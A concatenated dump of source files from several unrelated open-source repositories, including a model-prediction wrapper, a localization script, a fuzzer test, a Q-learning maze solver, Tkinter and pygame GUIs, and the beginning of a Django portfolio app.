#### File: ZOO-Attack/fast_adversarial/post_model_tf.py
```python
import tensorflow as tf
import numpy as np
import torch
from tqdm import tqdm
from .post_model import PostModel
class PostModelTf():
def __init__(self):
self.post_model = PostModel()
self.image_size = 32
self.num_channels = 3
self.num_labels = 10
def predict(self, x):
# print("===========================================")
# print(type(x))
# # print(x)
#
# x = tf.reshape(x, [-1, 32 * 32 * 3])
# y = tf.reduce_max(x, axis=1)
y = tf.py_function(func=self.py_predict, inp=[x], Tout=tf.float32)
return y
def py_predict(self, x):
if not isinstance(x, np.ndarray):
x = x.numpy()
x = x.astype(np.float32)
y_list = []
batch_size = 64
for i in range(0, len(x), batch_size):
x_batch = x[i:i+batch_size, :, :, :]
x_batch = torch.from_numpy(x_batch).cuda()
# x_batch = x_batch.unsqueeze(0)
# B x W x H x C -> B x C x W x H
x_batch = x_batch.permute(0, 3, 1, 2)
# if i == 0:
# self.post_model.update_post_model(x_batch)
y_batch = self.post_model.forward(x_batch)
y_list.append(y_batch.detach())
y = torch.cat(y_list)
# y = self.post_model.forward(x)
y = y.detach().cpu().numpy()
return y
``` |
{
"source": "jokerYellow/TranslateFiles",
"score": 2
} |
#### File: jokerYellow/TranslateFiles/localizable.py
```python
import re
from opencc import OpenCC
openCC = OpenCC('s2hk')
openCCS = OpenCC('hk2s')
arr = []
arrConst = []
def readFile(path):
f = open(path,'r');
content = f.readlines();
f.close()
return content;
def writeFile(path,content):
f = open(path,'w')
f.write(content);
f.close();
#以下语句不处理
#DKImageWithNames
#//
##NSLog
def shouldIgnore(string):
regs = ['^[ ]*//[ ]*',
'^[ ]*NSLog\(@\"[ ]*'];
for reg in regs:
if re.search(reg,string):
return True;
regsShouldRecord = ['const[ ]*',
'^[ ]*NSAssert[ ]*',
'imageNamed[ ]*\:[ ]*'];
for reg in regsShouldRecord:
if re.search(reg,string):
arrConst.append(string);
return True;
return False;
#判断是否已经处理过了,为true则需要处理,为false则已经处理过了
def shouldHandle(string):
regs = ['NSLocalizedString[ ]*\([ ]*$',
'NSLocalizedStringWithDefaultValue[ ]*\([ ]*$',
'NSLocalizedStringFromTable[ ]*\([ ]*$',
'NSLocalizedStringFromTableInBundle[ ]*\([ ]*$',
'localizedStringForKey[ ]*\:[ ]*$',
'STTLocalizedString[ ]*\([ ]*$'];
for reg in regs:
if re.search(reg,string):
return False;
return True;
def handleString(string,comment):
result = re.search(r'@"[^\n"]*[\u4E00-\u9FA5][^\n"]*"',string);
if result:
if shouldIgnore(string):
return string;
stringBefore = string[:result.span()[0]];
stringAfter = string[result.span()[1]:];
stringMiddle = result.group(0);
stringHK = openCC.convert(stringMiddle)
stringResult = str();
if shouldHandle(stringBefore):
stringReplace = "STTLocalizedString(%s)"%(stringHK);
stringResult = stringBefore+stringReplace+stringAfter;
addToLocalizable(stringHK,stringMiddle);
return handleString(stringResult,comment);
else:
#继续处理后面的字符串
stringAfter = handleString(stringAfter,comment);
stringResult = stringBefore+stringHK+stringAfter;
return stringResult;
else:
return string;
def appendRecord(content,path):
f = open(path,'a')
f.write(content);
f.close();
def addToLocalizable(hkStr,sStr):
hkStr = hkStr[1:];
sStr = openCCS.convert(sStr[1:]);
if arr.count((hkStr,sStr)) == 0:
arr.append((hkStr,sStr))
def saveLocalizableFile(replaceRecord):
if len(arr) == 0:
return;
content = str();
for (hk,s) in arr:
content = content + "%s = %s;\n"%(hk,s)
f = open(replaceRecord,'w')
f.write(content);
f.close();
def saveConstFile(replaceRecord):
if len(arrConst) == 0:
return;
content = str();
for s in arrConst:
content = content + "%s\n"%(s)
f = open(replaceRecord,'w')
f.write(content);
f.close();
def LocalizableFile(filePath,recordPath):
arr = [];
arrConst = [];
content = readFile(filePath);
result = str();
replaceRecord = str();
times = 0;
for i in range(0,len(content)):
line = content[i];
arr = filePath.split('/')
comment = "%s rownumber:%d"%(arr[len(arr)-1],i+1)
lineHandled = handleString(line,comment);
if line != lineHandled:
times = times+1;
replaceRecord = replaceRecord+filePath+'\n'+str(times)+'.'+'rownumber:%d'%(i+1)+'\n'+ "before:"+line+"\n"+"after:"+lineHandled + "--------------------------------------------------------------------------------------\n"
result = result+lineHandled
if replaceRecord:
appendRecord(replaceRecord+'\n',recordPath+'/changeLog');
saveLocalizableFile(recordPath+'/file.strings')
saveConstFile(recordPath+'/手动处理')
# writeFile(filePath,result);
return times;
``` |
{
"source": "JokeZhang/fuchsia",
"score": 2
} |
#### File: fuzzing/test/test_e2e.py
```python
import os
import sys
import unittest
import test_env
import lib.command as command
from lib.host import Host
from lib.factory import Factory
from test_case import TestCaseWithIO
class IntegrationTest(TestCaseWithIO):
def assertNoErrors(self):
"""Convenience method to reset stdout and assert stderr is empty."""
self.assertOut([], n=0)
self.assertErr([])
def test_e2e(self):
# Set up hermetic environment.
host = Host()
host.fd_out = self._stdout
host.fd_err = self._stderr
with host.temp_dir() as temp_dir:
# (Re-)parse the command line arguments, a la main.py.
factory = Factory(host=host)
parser = factory.parser
args = parser.parse_args()
# Ensure exactly 1 fuzzer is selected.
fuzzer = factory.create_fuzzer(args)
self.assertNoErrors()
args.name = str(fuzzer)
list_args = parser.parse_args(['list', args.name])
list_args.command(list_args, factory)
self.assertOut(
['Found 1 matching fuzzer for "{}":'.format(str(fuzzer))], n=1)
self.assertNoErrors()
start_args = parser.parse_args(
['start', '-o', temp_dir.pathname, args.name])
proc = command.start_fuzzer(start_args, factory)
self.assertNoErrors()
stop_args = parser.parse_args(['stop', args.name])
command.stop_fuzzer(stop_args, factory)
self.assertNoErrors()
if proc:
proc.wait()
check_args = parser.parse_args(['check', args.name])
command.check_fuzzer(check_args, factory)
self.assertOut(['{}: STOPPED'.format(args.name)], n=1)
self.assertNoErrors()
unit = os.path.join(temp_dir.pathname, 'unit')
with open(unit, 'w') as opened:
opened.write('hello world')
repro_args = parser.parse_args(['repro', args.name, unit])
command.repro_units(repro_args, factory)
self.assertNoErrors()
analyze_args = ['analyze', '-max_total_time=10', args.name]
if args.local:
analyze_args.append('--local')
analyze_args = parser.parse_args(analyze_args)
command.analyze_fuzzer(analyze_args, factory)
self.assertNoErrors()
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "jokfun/astrocalc",
"score": 3
} |
#### File: jokfun/astrocalc/lecture.py
```python
import sys
from intervalle import create_inter_without
from random import seed,shuffle
def lecture(source=None,target=None,fseed=100,fpercent=100):
"""
Create conversion of the source file and the target file
Shuffle method is used, base on the seed (default 100)
"""
seed(fseed)
try:
copysource = []
copytarget = []
if(source!=None and target!=None):
source = create_inter_without(source)
target = create_inter_without(target)
shuffle(source)
shuffle(target)
for i in range(0,(int(len(source)*fpercent/100))):
copysource.append(source[i])
if(len(copysource)==0):
copysource.append(source[0])
for i in range(0,(int(len(target)*fpercent/100))):
copytarget.append(target[i])
if(len(copytarget)==0):
copytarget.append(target[0])
return copysource,copytarget
except Exception as e:
print(e)
```
#### File: jokfun/astrocalc/relation.py
```python
from time import time
#import hungarian as hg
def intervalle(result,tab,dic):
"""
Group all element in an array, with 0 duplication by using a dictionary which works here as a memory
"""
for ligne in tab:
for ele in ligne:
"""
All the trick is here
By using a dic, we don't have to check all the elements in the array result
It'll reduce the time process because size of array result will be bigger and bigger
"""
try:
a = dic[str(ele)]
except Exception as e:
dic[str(ele)] = []
result.append(ele)
return result,dic
def create_all(source,target):
"""
Group all the element of the source and the target in a single array, with 0 duplication
All existing interval of both files will be return
"""
t = time()
result = []
dic = {}
result,dic = intervalle(result,target,dic)
result,dic = intervalle(result,source,dic)
return result
def belongTo(interval,tab,name):
"""
Build the condensed representation for interval-based relations
"""
result = []
for i in range(0,len(interval)):
for j in range(0,len(tab[0])):
for k in range(0,len(tab)):
if interval[i][0][0] >= tab[k][j][0] and interval[i][0][1] <= tab[k][j][1]:
interval[i].append(name+str(j))
break
def createError(inter,len1,len2,nsource,ntarget):
"""
Build the error measures
"""
result = []
for i in range(0,len1):
ligne = []
for j in range(0,len2):
valmax = 0
valoccur = 0
for k in inter:
if nsource+str(i) in k:
valmax+=1
if ntarget+str(j) in k and nsource+str(i) in k:
valoccur+=1
ligne.append(1-(valoccur/valmax))
result.append(ligne)
return result
def relation(source,target):
"""
Create the similarity between the source and the target
"""
resum = []
inter = create_all(source,target)
new = []
for k in inter:
new.append([k])
inter = new
t = time()
nameSource = "src"
nameTarget = "trg"
belongTo(inter,source,nameSource)
belongTo(inter,target,nameTarget)
taberror = createError(inter,len(source[0]),len(target[0]),nameSource,nameTarget)
resum.append(taberror)
"""
#Remove comment to test the example
for k in taberror:
print(k)
"""
"""
Can return the hungarian result
"""
#hungarian = hg.Hungarian(taberror)
#hungarian.calculate()
#result = hungarian.get_results()
return resum
if __name__=="__main__":
"""
Test to check if the algorithms used (SIMILARITY) are correct
"""
source = [
[[0,0.5],[0,1],[0,1]],
[[1,1.5],[1,2],[3,3.5]],
[[2,3],[1.5,4],[2,3]]
]
target = [
[[0,1.5],[1,2],[1.6,1.8],[2,3]],
[[0,1.5],[1,2],[3.1,4],[2,3]],
[[0,1.5],[0,1],[0,0.5],[1,2]],
[[2,3.5],[2,3],[0,0.5],[1,2]],
[[2,3.5],[1,2],[0,0.5],[1,2]]
]
relation(source,target)
```
#### File: jokfun/astrocalc/similarity.py
```python
from tkinter import *
from tkinter.filedialog import *
from lecture import lecture
from relation import relation
from random import randint
import os
class similarity:
def __init__(self,win):
win.title("Similarity")
self.fen1 = win
listd = self.fen1.grid_slaves()
for l in listd:
l.destroy()
self.source = None
self.target = None
def sourceFile(self):
#Just select the csv files
sourcef = askopenfilename(title="Select the source",
initialdir=os.getcwd(),
filetypes=[('csv files','.csv')])
try :
self.source = open(sourcef,"r")
self.nameT1 = sourcef
self.txtfile1.configure(text = sourcef)
except Exception as e:
self.txtfile1.configure(text = "Erreur lors de l'ouverture du fichier")
def targetFile(self):
#Just select the csv files
targetf = askopenfilename(title="Select the target",
initialdir=os.getcwd(),
filetypes=[('csv files','.csv')])
try :
self.target = open(targetf,"r")
self.nameT2 = targetf
self.txtfile2.configure(text = targetf)
except Exception as e:
self.txtfile2.configure(text = "Erreur lors de l'ouverture du fichier")
def addligne(self,tab, name):
text = name + " :\n"
for i in range(0,len(tab)):
text += str(tab[i])+"\n"
return text
def savefile(self,savedata):
"""
Seelct a save file
Write the result in the save file selected
"""
rep=os.getcwd()
savemsg = ""
nomfile = "save_"+str(randint(0,1000))
try:
repfic = asksaveasfilename(title="Save result",
initialdir=rep,
initialfile=nomfile,
filetypes = [("txt files",".txt")])
if(len(repfic)>0):
f = open(repfic+".txt","w")
for k in savedata:
f.write(k)
f.close()
savemsg = "Results saved in : "+repfic+".txt"
else:
savemsg = "Change the save"
except Exception as e:
savemsg = 'Error while saving the file'
self.errsave = Label(self.fen1, text =savemsg,justify="left")
self.errsave.grid(row =8, column=3,sticky="w")
def resum(self,tab):
self.frame = Frame(self.fen1,width=400,height=300)
self.frame.grid(row=6,column=3)
self.frame.grid_propagate(False)
self.frame.grid_rowconfigure(0, weight=1)
self.frame.grid_columnconfigure(0, weight=1)
ens = ["seed","percent","erreur"]
text = ""
for i in range(0,len(tab)):
text+=self.addligne(tab[i],ens[i]) + "\n"
self.res = Text(self.frame,borderwidth=3, relief="sunken",wrap='word')
self.res.grid(row=0,column=0,padx=5,pady=5)
self.res.insert(END, text)
self.scrolly = Scrollbar(self.frame, command=self.res.yview)
self.scrolly.grid(row=0, column=1, sticky='nsew')
self.res['yscrollcommand'] = self.scrolly.set
"""
scrollx = Scrollbar(frame, command=res.xview)
scrollx.config(orient="horizontal")
scrollx.grid(row=1, column=0, sticky='nsew')
res['xscrollcommand'] = scrollx.set
"""
return text
def launch(self):
if(self.source!=None and self.target!=None and type(self.source)!=list and type(self.target)!=list):
seedget = self.seed.get()
percentget = self.percent.get()
try:
fseed = int(seedget)
except Exception:
fseed = 100
try:
fpercent = int(percentget)
if fpercent<=0 or fpercent>100:
fpercent = 100
except Exception:
fpercent = 100
source,target = lecture(self.source,self.target,fseed,fpercent)
result = relation(source,target)
savetext = self.resum([[fseed], [fpercent]] + result)
self.savef=Button(self.fen1, text="Save",command= lambda: self.savefile(savetext))
self.savef.grid(row=7,column=3,sticky="W")
else:
self.txtfile3.configure(text = "Missing files")
def run(self):
#Select the Source
self.txt1 = Label(self.fen1, text ='Source :')
self.txt1.grid(row =1,column=1)
self.txtfile1 = Label(self.fen1, text = "No file")
self.txtfile1.grid(row =1, column=3,sticky=W)
self.bouton1=Button(self.fen1, text="Select", command=self.sourceFile)
self.bouton1.grid(row =1, column =2)
#Select the target
self.txt2 = Label(self.fen1, text ='Target :')
self.txt2.grid(row =2, column=1)
self.bouton2=Button(self.fen1, text="Select", command=self.targetFile)
self.bouton2.grid(row =2, column =2)
self.txtfile2 = Label(self.fen1, text = "No file")
self.txtfile2.grid(row =2, column=3,sticky=W)
#Select the Seed
self.txt3 = Label(self.fen1, text = 'Seed :')
self.txt3.grid(row =3, column=1)
self.seed = Entry(self.fen1, width=10)
self.seed.grid(row =3, column=2)
#Select the Percent
self.txt4 = Label(self.fen1, text= 'Percent :')
self.txt4.grid(row =4, column=1)
self.percent = Entry(self.fen1, width=10)
self.percent.grid(row =4, column=2)
#Lauch
self.lancement=Button(self.fen1, text="Launch",command=self.launch)
self.lancement.grid(row=5, column=1)
self.txtfile3 = Label(self.fen1, text = "Waiting to launch")
self.txtfile3.grid(row =5, column=2)
``` |
{
"source": "jokfun/Dog_Breed_Classifier",
"score": 4
} |
#### File: jokfun/Dog_Breed_Classifier/window.py
```python
from tkinter import *
from PIL import ImageTk, Image
from tkinter import filedialog
import os
from testme import Predict
class Window:
def __init__(self,classifier):
#the most demanding function is loaded before application
self.predict = Predict(classifier)
#the main tkinter app
self.root = Tk()
self.root.title("Dog Breed Classifier")
#can't resize the window
self.root.resizable(width=False, height=False)
#create an empty filename in order to create the label
self.filename=""
#label of the image's path
self.pathtext = Label(self.root, text=self.filename)
self.pathtext.grid(row=1,column=1)
#label of the prediction
self.predictiontext = Label(self.root, text="")
self.predictiontext.grid(row=2,column=1)
#default image displayed
self.open_img("FirstDog.jpg")
#button to load a new image
btn = Button(self.root, text='open image', command=self.open_img)
btn.grid(row=1,column=0)
#button to launch the prediction
btn = Button(self.root, text='Run', command=self.getPredict)
btn.grid(row=2,column=0)
#main loop of the tkinter window, create all the content before calling it
self.root.mainloop()
def getPredict(self):
"""
Here we call the function that predicts a new image
"""
#the attribute allows to have a returned result
prediction = self.predict.run(self.filename,printPrediction=True)
#set the prediction label
self.predictiontext["text"] = "Best match : "+prediction
def openfn(self):
"""
open a dialog box to return the path of an image
"""
self.filename = filedialog.askopenfilename(title='Choose an image',
filetypes=[('jpg', '.jpg'),('jpeg', '.jpeg')])
def open_img(self,path=None,verbose=True):
"""
Load a new image according to the path
Go place the image in the window
"""
#have a default image which is load at the begining
#otherwise have to charge an other one
if path==None:
self.openfn()
else:
self.filename=path
#display the image loaded in the console
if verbose:
print("=================")
print("File open :",self.filename)
#keep the name of the img and not the whole path
self.pathtext["text"] = self.filename.split('/')[-1]
#the image will be resized, it may look strange
img = Image.open(self.filename)
img = img.resize((400, 400), Image.ANTIALIAS)
img = ImageTk.PhotoImage(img)
#the new image is placed in the same position
panel = Label(self.root, image=img)
panel.image = img
panel.grid(row=0, column=0, columnspan=2, rowspan=1,
sticky=W+E+N+S, padx=5, pady=5)
if __name__ == "__main__":
#Default classifier
classifier = "dog_classifier.tfl.ckpt-24700"
window=Window(classifier)
``` |
{
"source": "jokfun/Maze-Solver-QLearning",
"score": 3
} |
#### File: jokfun/Maze-Solver-QLearning/solver.py
```python
import os
#We don't want to show the pygmy version and welcome message. Snif
os.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = "hide"
from random import uniform,randint
import tqdm
"""
We import pygame in order to create a patch for the long calculations
If the QLearning calculation time or the creation of the path is too long, the application crashes.
So we need to create a patch to avoid this
This patch is not too resource-intensive and is not necessary if you don't use the graphical interface
"""
import pygame
class Solver:
def __init__(self,maze,learning_rate=0.8,discount_factor=0.5,maxstep=1000,epsilon=0.3,interface=True):
"""
Initiate the solver
Hyperparameters :
- maze : the maze which is a 2-dimensional array containing only numerical values
- learning_rate : the learning rate of the QLearning algorithm, must be between 0 and 1
- discount_factor : the discount factor of the QLearning algorithm, must be between 0 and 1
- maxstep : Number of explorations the agent will perform.
An exploration starts at the start and must find the exit.
- epsilon : the value of the espilon-greedy method, must be between 0 and 1
- interface : if you are using the solver with an application (True) or not (False)
"""
self.learning_rate = learning_rate
self.discount_factor = discount_factor
self.maxstep = int(maxstep)
self.epsilon = epsilon
#Variable indicating whether an interface is used
self.interface = interface
"""
Maze code :
path = 0
start = 1
end = 2
trap = 3
wall = 4
"""
self.maze = maze
#Create constants of the maze
self.length = len(maze)
self.width = len(maze[0])
#Explore the maze
self.start = None
self.end = None
self.trap = []
for i in range(self.length):
for j in range(self.width):
ele = maze[i][j]
if ele == 1:
self.start = (i,j)
elif ele == 2:
self.end = (i,j)
elif ele == 3:
self.trap.append((i,j))
#The maze must have an enter and an exit
if self.start==None or self.end==None:
print("Maze must have a start (code1) and an end (code 2)")
quit()
def learning(self):
"""
Algorithm of QLearning you can find in
"Reinforcement learning : An Introduction" of Sutton and Barto
"""
#Init the QTable
self.createQ()
#Until all the episodes are completed
for i in tqdm.trange(self.maxstep):
#Begin the episode at the start of the maze
posX = self.start[0]
posY = self.start[1]
#The episode runs until the agent arrives at his destination
while(not(posX==self.end[0] and posY==self.end[1]) and
not ((posX,posY) in self.trap)):
#Application control
if self.interface :
#The crash proof patch
events = pygame.event.get()
for event in events:
if event.type == pygame.QUIT:
pygame.quit()
exit()
#The next position of the agent depend on a greedy choice
choice = self.greedyChoice(posX,posY)
#Update the next position of the agent
newX,newY = self.updatePosition(choice,posX,posY)
#Test if the new position is the exit
if newX==self.end[0] and newY==self.end[1]:
reward = 1
#Test of the new position is a trap
elif (newX,newY) in self.trap:
reward = -1
else:
reward = 0
#Coordinates in the QTable of the last and new position
t_pos = posX*self.width+posY
tpos = newX*self.width+newY
#Update the QTable
self.Qtable[t_pos][choice] = self.Qtable[t_pos][choice] + self.learning_rate * (reward + self.discount_factor*max(self.Qtable[tpos]) - self.Qtable[t_pos][choice])
#Position of the agent is update
posX=newX
posY=newY
#When the algorithm is over, create the path the agent has to follow from the start to the end
path = []
posX = self.start[0]
posY = self.start[1]
#Create a counter while creating the path
count = 0
#Create the path until it finds the exit
#OR it reaches a limit :
# The Q-Learning might not reach the best solution with the maxstep we fixed so you can't find the best way to the exit
while not(posX==self.end[0] and posY==self.end[1]) and count<=self.length*self.width:
#Application control
if self.interface :
#The crash proof patch
events = pygame.event.get()
for event in events:
if event.type == pygame.QUIT:
pygame.quit()
exit()
#Coordinates in the QTable of the position
pos = posX*self.width+posY
#Take the best direction
direction = self.Qtable[pos].index(max(self.Qtable[pos]))
#Update the path
path.append(direction)
#Update the next position
posX,posY = self.updatePosition(direction,posX,posY)
count+=1
return path,self.start
def updatePosition(self,direction,posX,posY):
"""
Update (x,y) coordinates depend on a direction
"""
if direction==0:
posX-=1
elif direction==1:
posX+=1
elif direction==2:
posY+=1
elif direction==3:
posY-=1
return posX,posY
def greedyChoice(self,posX,posY):
"""
Epsilon-Greedy choice
"""
#Take the line in QTable correspondint to the position
ligne = self.Qtable[posX*self.width+posY]
if uniform(0,1)>=self.epsilon:
#best choice of the line
return ligne.index(max(ligne))
else:
#Or take a random position
#Not the most elegant way to do it
choice = []
for i in range(4):
if ligne[i]!=-1:
choice.append(i)
pos = randint(0,len(choice)-1)
return choice[pos]
def createQ(self):
"""
Create the Qtable
Globaly, just have to test if the value at a specific position is a wall or not
"""
self.Qtable = []
for i in range(self.length):
for j in range(self.width):
ligne = []
#up
if i-1<0 or self.maze[i-1][j]==4:
ligne.append(-1)
else:
ligne.append(0)
#bottom
if i+1>=self.length or self.maze[i+1][j]==4:
ligne.append(-1)
else:
ligne.append(0)
#right
if j+1>=self.width or self.maze[i][j+1]==4:
ligne.append(-1)
else:
ligne.append(0)
#left
if j-1<0 or self.maze[i][j-1]==4:
ligne.append(-1)
else:
ligne.append(0)
self.Qtable.append(ligne)
if __name__ == "__main__":
"""
Test a maze
"""
maze = [
[0,0,0,0,0,0,0,4,2],
[0,0,0,0,0,4,0,4,0],
[0,0,0,0,3,4,0,0,0],
[0,0,0,0,0,4,4,4,0],
[1,0,0,0,0,0,0,4,3]
]
solver = Solver(maze,interface=False)
print(solver.learning())
``` |
{
"source": "jokfun/Text-Button-Pygame",
"score": 4
} |
#### File: jokfun/Text-Button-Pygame/textinput.py
```python
import pygame
class textInput:
def __init__(self,screen,axex,axey,length,height,
maxdigit = 8,
textsize=20,
textcolor=(255,255,255),
bordercolor=(255,255,255),
bordercolor_click=(0,0,255),
fontcolor=(7,9,44) ):
"""
Required parameters :
- screen of your game/app (created with pygame.display.set_mode)
- axex = position x of the top left corner of the box
- axexy = position y of the top left corner of the box
- length = length of the box
- height = height of the box
Optional hyperparameters :
- maxdigit = number of digits allowed in the content (incl. point)
- textsize = size of the text
- textcolor = color of the text display
- bordercolor = color of the outer edge of the field
- bordercolor_click = color of the outer edge of the field when you click on
- fontcolor = field background color
"""
#Fix the values of the different color
self.bordercolor = bordercolor
self.fontcolor = fontcolor
self.textcolor = textcolor
self.textsize = textsize
self.bordercolor_click = bordercolor_click
#Fix your screen used in your app
self.screen = screen
#Fix the number of digits allowed in the content
self.maxdigit = maxdigit
#Fix positions of the field
self.axex = axex
self.axey = axey
self.length = length
self.height = height
#Create the field
self.rect = pygame.rect.Rect( (axex,axey) , (length,height) )
screen.fill(self.bordercolor, self.rect)
screen.fill(self.fontcolor, self.rect.inflate(-2, -2))
#Init the content
self.content = "0"
#Create the font of the text
self.textfont = pygame.font.SysFont('Calibri', self.textsize)
#Show the field
self.displaytext()
#boolean to test if you click on the field
self.click = False
#Values allow in the content
self.allow = [str(i) for i in range(10)]
def displaytext(self):
"""
Function to update the content on the field
"""
self.screen.fill(self.fontcolor, self.rect.inflate(-2, -2))
self.textsurface = self.textfont.render(self.content, False, self.textcolor)
self.screen.blit(self.textsurface,(self.axex+5,self.axey+15))
def update(self,events,posx,posy):
"""
Method for updating content based on user actions
Parameters :
- events : list of pygame event
- posx = position x of the mouse
- posy = position y of the mouse
"""
#Test if the mouse is in the text field
if not (posx>=self.axex and posx<=self.axex+self.length and posy>=self.axey and posy<=self.axey+self.height):
if pygame.mouse.get_pressed()[0]==1:
#If you click outside the field, it will reset the border and prevent it from being changed
self.click = False
self.screen.fill(self.bordercolor, self.rect)
self.screen.fill(self.fontcolor, self.rect.inflate(-2, -2))
elif pygame.mouse.get_pressed()[0]==1:
#If you click in the field, the border will change and you will be able to modify it
self.click=True
self.screen.fill(self.bordercolor_click, self.rect)
self.screen.fill(self.fontcolor, self.rect.inflate(-2, -2))
#If you can change the content
if self.click == True:
for event in events:
#If a key is pressed
if event.type == pygame.KEYDOWN:
#Delete content if it exists
if event.key == pygame.K_BACKSPACE and len(self.content)>0:
self.content = self.content[:-1]
#Add a dot (for decimal numbers)
elif (event.key == pygame.K_KP_PERIOD or event.key == pygame.K_PERIOD) and len(self.content)<self.maxdigit:
#Cannot add dot if it's already in
if "." not in self.content:
self.content = self.content + "."
#Take the value of the pressed key and convert it into readable data
value = pygame.key.name(event.key)
value = value.split("[")[-1].split("]")[0]
#If the value is allowed, it is added to the content.
if value in self.allow and len(self.content)<self.maxdigit:
self.content = self.content + value
#Update the text of the field
self.displaytext()
def getValue(self):
"""
Return the value of the content
"""
return float(self.content)
if __name__ == "__main__":
import time
pygame.init()
pygame.font.init()
screen = pygame.display.set_mode((300, 100))
#We create the text field
text = textInput(screen,20,30,200,50,maxdigit=15)
while True:
pygame.display.update()
events = pygame.event.get()
for event in events:
if event.type == pygame.QUIT:
pygame.quit()
exit()
mouse = pygame.mouse.get_pos()
x = mouse[0]
y = mouse[1]
#We update the text
text.update(events,x,y)
``` |
{
"source": "jokiefer/sweethome",
"score": 2
} |
#### File: accounts/migrations/0002_initial_data.py
```python
import os
from django.contrib.auth import get_user_model
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('accounts', '0001_initial'),
]
def generate_superuser(apps, schema_editor):
superuser = get_user_model().objects.create_superuser(
username=os.environ.get("SWEETHOME_USER"),
password=<PASSWORD>("<PASSWORD>")
)
superuser.is_active = True
superuser.save()
operations = [
migrations.RunPython(generate_superuser),
]
```
#### File: backend/home/managers.py
```python
from django.db import models
from django.db.models.aggregates import Sum
class PartQuerySet(models.QuerySet):
def for_building(self, building_id):
return self.filter(unit__surface__room__level__building__pk=building_id)
def total_price(self):
return self.aggregate(total_price=Sum('price'))
``` |
{
"source": "jokieleung/Maria",
"score": 3
} |
#### File: retrieval_model/tokenization/to_hdf5.py
```python
import h5py
import numpy as np
import tqdm
from transformers import AutoTokenizer
def validate_hdf5(fname, tokenizer_name):
print("--------------------------------------------")
print("Start to valid the hdf5 file", fname + '.' + tokenizer_name + '.hdf5')
with open(fname,'rb') as f:
lines = []
for line in f:
line = line.decode()
if 'wiki' in fname:
# Wiki103: remove document title
if line.startswith(' = '):
continue
# Full Wiki: Remove the too short lines.
if len(line.strip().split(' ')) < 5:
continue
if len(line.strip()) == 0:
# Always drop empty line
continue
lines.append(line)
# Use the slow tokenizer to validate the results of the fast tokenizer.
tokenizer = AutoTokenizer.from_pretrained(tokenizer_name)
h5_file = h5py.File(fname + '.' + tokenizer_name + '.hdf5', 'r')
tokens = h5_file['tokens']
print("Start to check the first 10 lines:")
ids = []
for line in lines[:10]:
ids.extend(tokenizer.convert_tokens_to_ids(tokenizer.tokenize(line)))
ids = np.array(ids)
first_tokens = np.array(tokens[:len(ids)])
if np.array_equal(ids, first_tokens):
print("PASS")
else:
print(' '.join(tokenizer.convert_ids_to_tokens(ids)))
print()
print(' '.join(tokenizer.convert_ids_to_tokens(first_tokens)))
assert False, "FAIL"
print("Start to check the last 10 lines:")
ids = []
for line in lines[-10:]:
ids.extend(tokenizer.convert_tokens_to_ids(tokenizer.tokenize(line)))
ids = np.array(ids)
last_tokens = np.array(tokens[-len(ids):])
if np.array_equal(ids, last_tokens):
print("PASS")
else:
print(' '.join(tokenizer.convert_ids_to_tokens(ids)))
print(' '.join(tokenizer.convert_ids_to_tokens(last_tokens)))
assert False, "FAIL"
print("--------------------------------------------")
def to_hdf5(fname, tokenizer_name, validate=True):
print("Process %s" % fname)
h5_file = h5py.File(fname + '.' + tokenizer_name + '.hdf5', 'w')
dset = h5_file.create_dataset("tokens",
(0,),
maxshape=(None,),
dtype='int32')
dump_interval = 1000000
dump_iter = 0
with open('%s.%s' % (fname, tokenizer_name)) as f:
lines = 0
tokens = []
for line in tqdm.tqdm(f):
for token in map(int, line.split(' ')):
tokens.append(token)
if len(tokens) >= dump_interval:
dset.resize((dump_iter + len(tokens),))
dset[dump_iter: dump_iter + len(tokens)] = tokens
dump_iter += len(tokens)
tokens = []
lines += 1
dset.resize((dump_iter + len(tokens),))
dset[dump_iter: dump_iter + len(tokens)] = tokens
dump_iter += len(tokens)
assert len(dset) == dump_iter
h5_file.close()
if validate:
validate_hdf5(fname, tokenizer_name)
print()
``` |
{
"source": "jokieleung/tensorcom",
"score": 2
} |
#### File: tensorcom/test/test_zcom.py
```python
import numpy as np
from tensorcom import zcom
import random
def test_zmq():
port = random.randint(17000, 38999)
source = zcom.Connection(f"zpush://127.0.0.1:{port}")
sink = zcom.Connection(f"zpull://127.0.0.1:{port}")
a = np.random.uniform(size=(9, 7)).astype("float16")
source.send([a, a])
b, c = sink.recv()
del sink
del source
assert (a==b).all()
assert (a==c).all()
``` |
{
"source": "jokimies/django-pj-core",
"score": 2
} |
#### File: django-pj-core/tests/test_tags.py
```python
from django.test import TestCase
from django.template import Context, Template
from pjcore.templatetags.pjcore_tags import PERCENTAGE_DEFAULT_CLASSES
class TagTests(TestCase):
def tag_test(self, template, context, output):
t = Template('{% load pjcore_tags %}'+template)
c = Context(context)
self.assertEqual(t.render(c), output)
def test_colorize_percentage_less_than_zero(self):
template = "{{ value | colorize_percentage}}"
class_negative = PERCENTAGE_DEFAULT_CLASSES['negative']
context = { "value": -1.0 }
self.tag_test(template, context, class_negative)
def test_colorize_percentage_greater_than_zero(self):
template = "{{ value | colorize_percentage}}"
class_positive = PERCENTAGE_DEFAULT_CLASSES['positive']
context = { "value": 1.0 }
self.tag_test(template, context, class_positive)
``` |
{
"source": "jokimies/django-pj-portfolio",
"score": 2
} |
#### File: django-pj-portfolio/portfolio/views.py
```python
import json
from decimal import Decimal
import datetime
import time
import requests
import sys
from django.db.models import Sum
from django.views.decorators.csrf import ensure_csrf_cookie
from django.shortcuts import render, redirect, get_object_or_404
from django.views.generic import ListView, CreateView, DetailView, UpdateView, DeleteView, TemplateView
from django.utils.decorators import method_decorator
from django.core.exceptions import ImproperlyConfigured
from django.conf import settings
from rest_framework import viewsets, permissions, status
from rest_framework.views import APIView
from rest_framework import status
from rest_framework.response import Response
from portfolio.models import Transaction, Account, Security
from portfolio.forms import BuyForm, DepositWithdrawForm, InterestForm, DivForm, TxnBySecurityForm, AccountForm, TransactionDetailForm
from portfolio.serializers import SecuritySerializer, AccountSerializer
from portfolio.management.commands.update_share_prices import Command
class CustomEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, Decimal):
return float(obj)
if isinstance(obj, datetime.datetime):
return obj.strftime ('%Y/%m/%d/%H/%M/%S')
super(CustomEncoder, self).default(obj)
class PortfolioMixin(object):
def get_account(self):
account = get_object_or_404(Account, pk=account_id)
return account
def get_context_data(self, **kwargs):
ctx = super(PortfolioMixin, self).get_context_data(**kwargs)
ctx['account'] = self.get_account()
#print ctx
return ctx
class TransactionListView(ListView):
